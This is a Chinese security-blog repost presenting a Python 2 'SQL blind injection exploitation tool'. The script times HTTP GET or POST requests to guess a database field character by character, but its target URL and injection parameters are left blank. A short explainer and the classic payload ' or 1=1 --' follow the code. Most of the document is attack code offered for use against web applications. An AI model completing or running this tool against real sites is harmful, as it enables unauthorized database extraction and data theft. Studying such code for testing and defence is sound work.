SQL盲注利用工具

admin 2021年9月4日07:13:47评论95 views字数 1398阅读4分39秒阅读模式
  1. #! /usr/bin/env python 

  2. # coding:utf-8 

  3. # -------------------------------------------------- 

  4. # file_name: SQL延时注入漏洞利用工具 

  5. # --------------------------------------------------

  6. import os 

  7. import sys 

  8. import time 

  9. import requests


  10. #发送HTTP GET请求并获取返回数据 

  11. def get(url,params): 

  12.     res = requests.get(url,params = params).status_code 

  13.     return res


  14. #发送HTTP POST请求并获取返回数据 

  15. def post(url,params): 

  16.     res = requests.post(url,data=params).status_code 

  17.     return res


  18. #利用SQL注入漏洞获取数据 

  19. def get_data(): 

  20.     #定义URL 

  21.     #url = "" 

  22.     #定义数据提交方式;支持GET和POST方式 

  23.     method = "GET" 

  24.     #定义payloads 

  25.     payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') 

  26.     #定义目标字段长度 

  27.     length = 3 

  28.     #目标字段名称 

  29.     name = "" 

  30.     print "Is working, please wait......" 

  31.     for i in range(1,(length + 1)): 

  32.         for payload in payloads: 

  33.             #构造HTTP请求参数 

  34.             params = "" 

  35.             #获取开始时间 

  36.             start_time = time.time() 

  37.             if method == 'GET': 

  38.                 get(url,params) 

  39.             elif method == "POST": 

  40.                 post(url,params) 

  41.             else: 

  42.                 print "Please enter correct method" 

  43.                 break 

  44.             #获取结束时间 

  45.             end_time = time.time() 

  46.             #计算花费时间 

  47.             count_time = end_time - start_time 

  48.             if count_time > 3: 

  49.                 name += payload 

  50.                 print 'rtarget:%s' % (name), 

  51.                 sys.stdout.flush() 

  52.     print "nend,target:%s" % (name)


  53. if __name__ == '__main__': 

  54.     get_data()

SQL盲注:用SQL查询语句去猜解表名、字段、数据。


拿个简单的查询来说
select * from table where 条件='' or 1=1 --'
也就是在你的查询参数中加入:' or 1=1 --
其他改、删类似,注入的方式有很多种,以上只是最基本的一种。


本文始发于微信公众号(飓风网络安全):SQL盲注利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月4日07:13:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SQL盲注利用工具http://cn-sec.com/archives/359577.html

发表评论

匿名网友 填写信息